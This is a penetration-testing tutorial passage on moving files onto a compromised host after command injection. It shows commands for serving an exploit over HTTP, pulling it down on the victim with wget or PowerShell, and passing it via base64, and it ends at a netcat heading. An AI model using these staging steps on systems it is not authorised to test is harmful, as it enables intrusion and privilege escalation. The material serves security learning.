You’re sat in a dark room, only the light from your terminal illuminates behind you. You’ve just found a command injection vulnerability on a fortune 500 companies website. You’re looking at a minimum $5,000 bug bounty, if you can successfully elevate privileges to root, you’ve just paid off your new car; You just dropped into your shell, confirmed that you’re www-data, what next? You run a uname -a to check the kernel version, and you see that the kernel is vulnerable to one of the most infamous exploits ever, CVE-2016-5195 - Dirty Cow. Without proper terminal access via SSH how can you transfer the file over?
Post Exploitation - File Transfer
Linux offers a wide variety way of transfering files, some are more complex than other. Most methods here should be able to make use of pre-existing tools in most popular Linux distros.
HTTP File Transfer
The simplest way of transfering files by far is hosting them on a web server. Fortunately, there is a really handy module that allows you to spawn a HTTP server on demand.
[email protected]:~#python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
After hosting the file on your HTTP server (Ensure that HTTP is being forwarded on your network), you should be able to use wget or curl.
[email protected]:~$ wget http://127.0.0.1/exploit.py --2019-06-10 08:41:11-- http://127.0.0.1/exploit.py Connecting to 127.0.0.1:80... connected. HTTP request sent, awaiting response... 200 OK Length: 34 [text/plain] Saving to: ‘exploit.py.1’ exploit.py.1 100%[=================================================>] 34 --.-KB/s in 0s 2019-06-10 08:41:11 (1.57 MB/s) - ‘exploit.py’ saved [34/34] [email protected]:~$ls exploit.py
Or with Curl, another command line utility for sending web request via CLI
and for fun, Invoke-WebRequest with Powershell!
PS C:\Users\Victim> Invoke-WebRequest -Uri http://127.0.0.1/exploit.py -OutFile C:\Users\Victim\exploit.py PS C:\Users\Victim> ls Directory: C:\Users\Victim Mode LastWriteTime Length Name ---- ------------- ------ ---- <output ommited> -a---- 6/10/2019 8:46 AM 34 exploit.py
As you can see, HTTP Servers are a very powerful way of transfering files to both Windows and Linux boxes, but what if HTTP was blocked? Excellent question reader, Thankfully Base64 is another viable method!
This method works for both transfering files to the attacker and victim. On the attacking machine you’ll want to print the output of the file, then pipe said output to base64, encoding the contents of a file.
[email protected]:~# cat exploit.py |base64 dGhpcyBpcyBhIHRlc3QgZmlsZQppZ25vcmUgbWUgcGxzCg==
On the victim you can echo the contents of the file and pipe the output to base64 decode, then redirect the output from your terminal to a file.
[email protected]:~$echo "dGhpcyBpcyBhIHRlc3QgZmlsZQppZ25vcmUgbWUgcGxzCg==" | base64 -d >> exploit.py
I personally recommended to keep it as a one-liner due to formatting formatting issues that may arrise.
Netcat File Transfer